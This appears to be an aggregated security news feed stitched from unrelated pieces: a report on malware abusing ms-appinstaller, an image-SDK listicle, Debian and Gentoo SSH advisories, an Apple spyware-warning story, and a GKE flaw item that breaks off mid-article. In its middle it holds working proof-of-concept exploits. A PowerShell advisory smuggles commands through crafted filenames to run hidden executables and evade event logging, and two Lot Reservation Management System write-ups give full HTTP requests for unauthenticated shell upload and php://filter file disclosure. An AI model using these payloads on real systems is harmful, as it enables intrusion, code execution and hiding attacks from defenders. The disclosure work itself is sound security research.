Microsoft on Thursday said it’s once again disabling the ms-appinstaller protocol handler by default following its abuse by multiple threat actors to distribute malware.
“The observed threat actor activity abuses the current implementation of the ms-appinstaller protocol handler as an access vector for malware that may lead to ransomware distribution,” the Microsoft Threat Intelligence

Malware / Endpoint Security

Microsoft on Thursday said it's once again disabling the ms-appinstaller protocol handler by default following its abuse by multiple threat actors to distribute malware.

"The observed threat actor activity abuses the current implementation of the ms-appinstaller protocol handler as an access vector for malware that may lead to ransomware distribution," the Microsoft Threat Intelligence team said.

It further noted that several cybercriminals are offering a malware kit for sale as a service that leverages the MSIX file format and ms-appinstaller protocol handler. The changes have gone into effect in App Installer version 1.21.3421.0 or higher.

The attacks take the form of signed malicious MSIX application packages that are distributed via Microsoft Teams or malicious advertisements for legitimate popular software on search engines like Google.

UPCOMING WEBINAR

From USER to ADMIN: Learn How Hackers Gain Full Control

Discover the secret tactics hackers use to become admins, how to detect and block it before it's too late. Register for our webinar today.

Join Now

At least four different financially motivated hacking groups have been observed taking advantage of the App Installer service since mid-November 2023, using it as an entry point for follow-on human-operated ransomware activity -

*   **Storm-0569**, an initial access broker which propagates BATLOADER through search engine optimization (SEO) poisoning with sites spoofing Zoom, Tableau, TeamViewer, and AnyDesk, and uses the malware to deliver Cobalt Strike and handoff the access to Storm-0506 for Black Basta ransomware deployment.

*   **Storm-1113**, an initial access broker that uses bogus MSIX installers masquerading as Zoom to distribute EugenLoader (aka FakeBat), which acts as a conduit for a variety of stealer malware and remote access trojans.

*   **Sangria Tempest** (aka Carbon Spider and FIN7), which uses Storm-1113's EugenLoader to drop Carbanak that, in turn, delivers an implant called Gracewire. Alternatively, the group has relied on Google ads to lure users into downloading malicious MSIX application packages from rogue landing pages to distribute POWERTRASH, which is then used to load NetSupport RAT and Gracewire.

*   **Storm-1674**, an initial access broker that sends fake landing pages masquerading as Microsoft OneDrive and SharePoint through Teams messages using the TeamsPhisher tool, urging recipients to open PDF files that, when clicked, prompts them to update their Adobe Acrobat Reader to download a malicious MSIX installer that contains SectopRAT or DarkGate payloads.

Microsoft described Storm-1113 as an entity that also dabbles in "as-a-service," providing malicious installers and landing page frameworks mimicking well-known software to other threat actors such as Sangria Tempest and Storm-1674.

In October 2023, Elastic Security Labs detailed another campaign in which spurious MSIX Windows app package files for Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex were used to distribute a malware loader dubbed GHOSTPULSE.

This is not the first time Microsoft has disabled the MSIX ms-appinstaller protocol handler in Windows. In February 2022, the tech giant took the same step to prevent threat actors from weaponizing it to deliver Emotet, TrickBot, and Bazaloader.

"Threat actors have likely chosen the ms-appinstaller protocol handler vector because it can bypass mechanisms designed to help keep users safe from malware, such as Microsoft Defender SmartScreen and built-in browser warnings for downloads of executable file formats," Microsoft said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Disables MSIX App Installer Protocol Widely Used in Malware Attacks

By Owais Sultan
Imgly SDK has been a popular choice for developers seeking reliable image processing and manipulation solutions. However, in…
This is a post from HackRead.com Read the original post: Exploring Imgly SDK Alternatives for Ultimate Flexibility

Imgly SDK has been a popular choice for developers seeking reliable image processing and manipulation solutions. However, in the dynamic software development environment, exploring alternatives can provide developers with greater flexibility and adaptability to varying project requirements.

In this article, we will delve into IMG.LY alternative SDKs that offer a range of features, allowing developers to choose the one that aligns best with their specific needs.

****1\. OpenCV (Open Source Computer Vision Library)****

Overview:

OpenCV is an open-source computer vision and machine learning library widely used in the field of image processing. It provides a comprehensive set of tools and algorithms for image and video analysis, making it a versatile choice for developers.

Key Features:

*   Image processing and manipulation.
*   Object detection and recognition.
*   Facial recognition.
*   Machine learning support.

Why Choose OpenCV:

OpenCV‘s extensive community support, cross-platform compatibility, and wide range of features make it a powerful alternative for developers looking for flexibility and customization in image processing.

****2\. ImageMagick****

Overview:

ImageMagick is a free open-source software suite for displaying, converting, and editing raster image files. It includes a command-line tool as well as a variety of libraries for different programming languages, making it adaptable to various development environments.

Key Features:

*   Image conversion and format support.
*   Image editing and manipulation.
*   Batch processing.
*   Command-line interface.

Why Choose ImageMagick:

ImageMagick’s versatility, support for a multitude of image formats, and command-line interface make it a strong contender for developers seeking a flexible image-processing solution.

****3\. Pillow (PIL Fork)****

Overview:

Pillow, a fork of the Python Imaging Library (PIL), is a Python Imaging Library that adds image processing capabilities to Python interpreters. It is a user-friendly alternative for developers working with Python applications.

Key Features:

*   Image manipulation and processing.
*   Support for various image formats.
*   Basic image editing operations.
*   Easy integration with Python applications.

Why Choose Pillow:

Pillow is an excellent choice for Python developers due to its simplicity, ease of use, and seamless integration with Python applications.

****4\. Sharp (for Node.js)****

Overview:

Sharp is a high-performance image processing library for Node.js applications. It is designed to be fast and efficient, making it suitable for handling image processing tasks in server-side applications.

Key Features:

*   Image resizing and manipulation.
*   Efficient memory handling.
*   Support for many image formats.
*   Advanced image processing operations.

Why Choose Sharp:

Developers working with Node.js can benefit from Sharp’s speed and efficiency, making it a go-to choice for server-side image processing tasks.

****5\. GD (Graphics Draw)****

Overview:

GD, or Graphics Draw, is an open-source library for dynamic image creation. It supports various programming languages, including PHP, and is commonly used for tasks such as creating thumbnails, processing images, and generating dynamic charts.

Key Features:

*   Image creation and manipulation.
*   Dynamic image generation.
*   Basic drawing functions.
*   Support for multiple programming languages.

Why Choose GD:

GD is a suitable choice for web developers, especially those working with PHP, as it provides a simple and efficient solution for dynamic image generation and manipulation.

****Conclusion****

While Imgly SDK has been a popular choice, exploring alternative image processing libraries can offer developers ultimate flexibility based on their project requirements, programming language preferences, and specific functionalities needed.

Each of the alternatives mentioned—OpenCV, ImageMagick, Pillow, Sharp, and GD—comes with its strengths and can be tailored to meet the diverse needs of image processing tasks.

By evaluating the features, ease of integration, and community support of each alternative, developers can make an informed decision that aligns with the goals of their projects.

****_RELATED ARTICLES_****

1.  **5 Best Video Editing SDKs for iOS**
2.  **Kotlin app development company – How to choose**
3.  **A Guide to Crafting a Dynamic App Using Weather APIs**
4.  **Run Android Applications on PC via Android SDK Manager**
5.  **The Role of DevOps in Streamlining Cloud Migration Processes**
6.  **Top Benefits of Using Flutter for Cross-Platform App Development**

Exploring Imgly SDK Alternatives for Ultimate Flexibility

Debian Linux Security Advisory 5591-1 - Several vulnerabilities were discovered in libssh, a tiny C SSH library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5591-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
December 28, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libssh  
CVE ID         : CVE-2023-6004 CVE-2023-6918 CVE-2023-48795  
Debian Bug     : 1059004 1059059 1059061

Several vulnerabilities were discovered in libssh, a tiny C SSH library.

CVE-2023-6004

    It was reported that using the ProxyCommand or the ProxyJump feature  
    may allow an attacker to inject malicious code through specially  
    crafted hostnames.

CVE-2023-6918

    Jack Weinstein reported that missing checks for return values for  
    digests may result in denial of service (application crashes) or  
    usage of uninitialized memory.

CVE-2023-48795

    Fabian Baeumer, Marcus Brinkmann and Joerg Schwenk discovered that  
    the SSH protocol is prone to a prefix truncation attack, known as  
    the "Terrapin attack". This attack allows a MITM attacker to effect  
    a limited break of the integrity of the early encrypted SSH  
    transport protocol by sending extra messages prior to the  
    commencement of encryption, and deleting an equal number of  
    consecutive messages immediately after encryption starts.

    Details can be found at https://terrapin-attack.com/

For the oldstable distribution (bullseye), these problems have been fixed  
in version 0.9.8-0+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 0.10.6-0+deb12u1.

We recommend that you upgrade your libssh packages.

For the detailed security status of libssh please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/libssh

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmWNhadfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TR1w/+Mmnf9FXB5B5jQrYIpKB+7ksoXkhNRs92qXbM4SoMT9y8Kps2Ao4cyY7X  
8S8eyzwSF1Q847Pb2yfmjQqFwonbjca+uSsvVfITYl0lwZpvV8vIdtZNbQmFp9l9  
QTohScBg2xKrOZ/G9A3dih8vWAuvRwKq+5OqRyPt5cHGLZ9isyfF0ccsRvw41lbU  
Uu0sfOZetfsDIT1F2Fg3hQW4LzMA1n3yrRMQkOH9iJtdubAoyRE5MzVQktG5FpyG  
zcDD824k0vqAnKeulKhb8hf0vpkW2Ji1UDh3eFqoaYRppBFpNyOKSKP1m+pab6We  
aUVpIIZhFFIKovR/ZE4LSpTPb8ZLSkrpBSadtxQ1GzCq8EYTfTABVd1weaxaHhZZ  
ctrbXeY6EPwc2OQOOozCbyNERve1n5YqPiMfHEheDoaOkxMMB4fiNmXvveSq/eCN  
EhSzCdXCl4Z0SKk71gnXUw7G832p2He/mzkVJqZlUusCOWflrUXZa/fcEO+CQNvU  
ZRieJDmcXZDBlqC7HC9Khoonth5Gbst//UPL6zOYa2auJ+ftUZLvPeSGMrKdJ//0  
CNiG/pWEBggHku+wocggj9ie00hpAltuv6d3nVzLDSNntcDzZ2KpUS6f0Vo8jfm9  
PvJ4ymTrCDypWOVEmCPq4h68AFwv75q56lyhvPU0UxnW5524C/U=IV9+  
-----END PGP SIGNATURE-----

Debian Security Advisory 5591-1

Gentoo Linux Security Advisory 202312-16 - Multiple vulnerabilities have been discovered in libssh, the worst of which could lead to code execution. Versions greater than or equal to 0.10.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libssh: Multiple Vulnerabilities  
     Date: December 28, 2023  
     Bugs: #920291, #920724  
       ID: 202312-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in libssh, the worst of  
which could lead to code execution.

Background  
=========  
libssh is a multiplatform C library implementing the SSHv2 protocol on  
client and server side.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-libs/libssh  < 0.10.6      >= 0.10.6

Description  
==========  
Multiple vulnerabilities have been discovered in libssh. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libssh users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/libssh-0.10.6"

References  
=========  
[ 1 ] CVE-2023-6004  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6004  
[ 2 ] CVE-2023-48795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-48795

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-16

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-16

Gentoo Linux Security Advisory 202312-17 - Multiple vulnerabilities have been discovered in OpenSSH, the worst of which could lead to code execution. Versions greater than or equal to 9.6_p1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: OpenSSH: Multiple Vulnerabilities  
     Date: December 28, 2023  
     Bugs: #920292, #920722  
       ID: 202312-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in OpenSSH, the worst of  
which could lead to code execution.

Background  
=========  
OpenSSH is a free application suite consisting of server and clients  
that replace tools like telnet, rlogin, rcp and ftp with more secure  
versions offering additional functionality.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-misc/openssh  < 9.6_p1      >= 9.6_p1

Description  
==========  
Multiple vulnerabilities have been discovered in OpenSSH. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All OpenSSH users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/openssh-9.6_p1"

References  
=========  
[ 1 ] CVE-2023-48795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-48795  
[ 2 ] CVE-2023-51385  
      https://nvd.nist.gov/vuln/detail/CVE-2023-51385  
[ 3 ] CVE-2023-51385,CVE-2023-48795  
      https://nvd.nist.gov/vuln/detail/CVE-2023-51385,CVE-2023-48795

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-17

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-17

Prior work from this researcher disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames. This research builds on their PSTrojanFile work, adding a PS command line single quote bypass and PS event logging failure. On Windows CL tab, completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution. However, if the filename got wrapped in single quotes it failed, that is until now.

[+] Credits: John Page (aka hyp3rlinx)      
[+] Website: hyp3rlinx.altervista.org  
[+] Source:  http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec     

 [Vendor]  
www.microsoft.com

[Product]  
Microsoft Windows PowerShell

Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.

[Vulnerability Type]  
PowerShell Single Quote Code Execution / Event Log Bypass

[CVE Reference]  
N/A

[Security Issue]  
In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames.  
This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure.  
On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution.  
However, if the filename gets wrapped in single quotes it failed, that is until now.

[Single Quote Code Exec Bypass]  
Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename.  
The trailing semicolon ";"  delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated.

Take the following three test cases using Defender API which takes a specially crafted filename.  
C:\>powershell Set-ProcessMitigation -PolicyFilePath  "Test;saps DOOM;.xml"

1) Double quotes OK  
"Test;saps DOOM;.xml" 

2) Single quotes FAILS  
'Test;saps DOOM;.xml'

3) Single quotes BYPASS  
'Test&DOOM;.xml'

PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands.  
C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here  
and that it also excludes the .EXE portion in that filename.

[PS Event Log Bypass]  
On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes.  
However, when bypassing PS single quotes I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log.  
Example, processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed.

Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory)  
C:\>powershell Get-Filehash  'Infected&Malware;.zip'  -algorithm MD5

Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating.

[PS Log ID 403 Snippet]  
Engine state is changed from Available to Stopped. 

Details:   
  NewEngineState=Stopped  
  PreviousEngineState=Available

  SequenceNumber=25

  HostName=ConsoleHost  
  HostVersion=5.1.19041.1682  
  HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0  
  HostApplication=powershell get-filehash 'Infected  
  EngineVersion=5.1.19041.1682

[Exploit/POC]  
powershell Get-Filehash  'Infected&Malware;.zip'  -algorithm MD5

Run some malware plus bypass logging of true file name:  
C:\Users\gg\Downloads>powershell get-filehash  'Infected&Malware;.zip'  -algorithm  md5  
PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename.

Defender Anti-Malware API:  
powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Call ping cmd using double "&":  
C:\>powershell Get-Filehash  'powerfail&ping 8.8.8.8&.txt'  -algorithm  md5

Call a Windows cmd to Logoff the victim:  
C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'

We have options:

A) to call commands use double "&" --> 'virus&logoff&test.zip'  
B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip'

[References]  
https://github.com/hyp3rlinx/PSTrojanFile  
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt  
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt

[Network Access]  
Local

[Severity]  
High

[Disclosure Timeline]  
Vendor Notification: circa 2019  
December 27, 2023 : Public Disclosure

[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Windows PowerShell Code Execution / Event Log Bypass

Lot Reservation Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server.Proof of Concept:-(HTTP POST Request)POST /lot/admin/ajax.php?action=save_division HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027Content-Length: 606Origin: http://192.168.150.228Connection: closeReferer: http://192.168.150.228/lot/admin/index.php?page=divisions-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="id"-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="name"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="description"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="img"; filename="phpinfo.php"Content-Type: application/x-php<?php phpinfo() ?>-----------------------------217984066236596965684247013027--Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address.

Lot Reservation Management System 1.0 Shell Upload

Lot Reservation Management System version 1.0 suffers from a file disclosure vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario.Proof of Concept:-(HTTP POST Request)GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9snUpgrade-Insecure-Requests: 1The same can be achieved by removing the PHPSESSID cookie as below:-GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1The file requested will be returned in base64 format in returned HTTP response.The attack can also be used to traverse directories to return files outside the web root.GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1This will return test.php file in the D:\ directory.

Lot Reservation Management System 1.0 File Disclosure

By Waqas
Big Tech vs. Big Brother: Apple Defies India Pressure over iPhone Hacking Alerts.
This is a post from HackRead.com Read the original post: Apple’s iPhone Hack Attack Warnings Spark Political Firestorm in India

Apple warned Indian opposition figures and journalists of possible state-backed hacking last year, causing tension with the government questioning the claims and pressuring Apple to soften them.

In October 2023, Apple sent notifications to some Indian opposition politicians and journalists warning them that their iPhones might be targeted by **state-sponsored attackers**. This triggered a strong reaction from the Indian government, which accused Apple of interfering in the country’s internal affairs and questioned the accuracy of its warnings.

Now, Indian officials, as **reported** by the Washington Post, pressured Apple to soften the language of the notifications and even summoned a company security expert for a meeting in New Delhi. Apple, on the other hand, has maintained that its notifications are based on credible evidence and that it does not attribute hacking attempts to specific governments.

The individuals who received Apple’s hacking warnings and subsequently posted about them on social media shared a common characteristic: they were critical of Prime Minister Modi’s government.

An investigation into the phone of journalist Anand Mangnale, who was examining Modi ally Gautam Adani, revealed the presence of **Pegasus spyware**, developed by the Israeli company **NSO Group**. While Apple did not explicitly attribute the attacks to the Indian government, Pegasus is typically sold to governments and government agencies.

The report further reveals that India’s ruling political party has neither confirmed nor denied the use of Pegasus to spy on journalists and political opponents. However, instances of critics being infected with Pegasus spyware have been previously **reported**, with a 2021 investigation revealing the presence of the spyware on the phones of individuals with a history of opposing and criticizing Modi’s government.

It is worth noting that if and when Apple suspects a user’s iPhone is being targeted by malicious threat actors or by a state-backed cyber attack, the company has a multi-pronged approach to warn the user. This includes threat notifications, security recommendations, email and iMessage alerts.

****1\. Threat Notification:****

1.  This is the most prominent method. A banner and alert appear on the user’s device when they sign in to appleid.apple.com.
2.  The alert clearly states that they “may be targeted by state-sponsored attackers trying to remotely compromise your iPhone.”
3.  It avoids specifying the attacker’s origin but offers general advice on security measures.

****2\. Email and iMessage Notifications:****

1.  Apple sends emails and iMessages to all email addresses and phone numbers associated with the user’s Apple ID.
2.  These notifications mirror the information in the web-based alert, reiterating the potential state-backed attack and suggesting security steps.

****3\. Security Recommendations:****

*   Both the web-based and email/iMessage notifications provide general security advice, such as:
    *   Updating devices to the latest software with security patches.
    *   Enabling two-factor authentication for Apple ID and other critical accounts.
    *   Reviewing iCloud settings and disabling access to non-essential apps.
    *   Changing passwords for important accounts.

It is also important to note that Apple doesn’t share specific details about the attackers or the attack methods to protect their sources and investigations. These notifications are triggered by specific indicators observed by Apple, but not all targeted users may receive one. Receiving a notification doesn’t necessarily mean your iPhone is compromised, but it’s a cautionary flag to take serious security measures.

****Hack alert vs. Apple lockdown mode****

It is also important to differentiate that while threat notifications alert users of cyberattacks, **Apple Lockdown mode** goes one step further by providing extreme protection against sophisticated digital threats by restricting certain functionalities like FaceTime, web browsing, and message attachments.

The Lockdown mode is also Primarily for individuals facing confirmed or imminent high-level cyber threats, such as journalists, activists, or dissidents. Nevertheless, the alleged involvement of Indian authorities in pressuring Apple to downplay the political impact of its hacking warnings, particularly targeting individuals critical of the Modi government.

The use of Pegasus spyware, known for its association with governments and government agencies, also raises concerns about potential state-sponsored surveillance of journalists and political opponents in India and elsewhere.

****_RELATED ARTICLES_****

1.  **QuaDream: Israeli Cyber Mercenary Behind iPhone Hacks**
2.  **Android Version of Sophisticated Pegasus Spyware Discovered**
3.  **iPhones of 9 State Dept officials hijacked by NSO Pegasus spyware**
4.  **Did Saudi Crown Prince use Israeli spyware to hack Jeff Bezos’s iPhone?**
5.  **iPhones of 36 Al Jazeera journalists hacked with NSO’s zero-click spyware**

Apple’s iPhone Hack Attack Warnings Spark Political Firestorm in India

Google Cloud has addressed a medium-severity security flaw in its platform that could be abused by an attacker who already has access to a Kubernetes cluster to escalate their privileges.
"An attacker who has compromised the Fluent Bit logging container could combine that access with high privileges required by Anthos Service Mesh (on clusters that have enabled it) to

Cloud Security / Data Protection

Google Cloud has addressed a medium-severity security flaw in its platform that could be abused by an attacker who already has access to a Kubernetes cluster to escalate their privileges.

"An attacker who has compromised the Fluent Bit logging container could combine that access with high privileges required by Anthos Service Mesh (on clusters that have enabled it) to escalate privileges in the cluster," the company said as part of an advisory released on December 14, 2023.

Palo Alto Networks Unit 42, which discovered and reported the shortcoming, said adversaries could weaponize it to carry out "data theft, deploy malicious pods, and disrupt the cluster's operations."

UPCOMING WEBINAR

From USER to ADMIN: Learn How Hackers Gain Full Control

Discover the secret tactics hackers use to become admins, how to detect and block it before it's too late. Register for our webinar today.

Join Now

There is no evidence that the issue has been exploited in the wild. It has been addressed in the following versions of Google Kubernetes Engine (GKE) and Anthos Service Mesh (ASM) -

*   1.25.16-gke.1020000
*   1.26.10-gke.1235000
*   1.27.7-gke.1293000
*   1.28.4-gke.1083000

*   1.17.8-asm.8
*   1.18.6-asm.2
*   1.19.5-asm.4

A key prerequisite to successfully exploiting the vulnerability hinges on an attacker having already compromised a FluentBit container by some other initial access methods, such as via a remote code execution flaw.

"GKE uses Fluent Bit to process logs for workloads running on clusters," Google elaborated. "Fluent Bit on GKE was also configured to collect logs for Cloud Run workloads. The volume mount configured to collect those logs gave Fluent Bit access to Kubernetes service account tokens for other Pods running on the node."

This meant that a threat actor could use this access to gain privileged access to a Kubernetes cluster that has ASM enabled and then subsequently use ASM's service account token to escalate their privileges by creating a new pod with cluster-admin privileges.

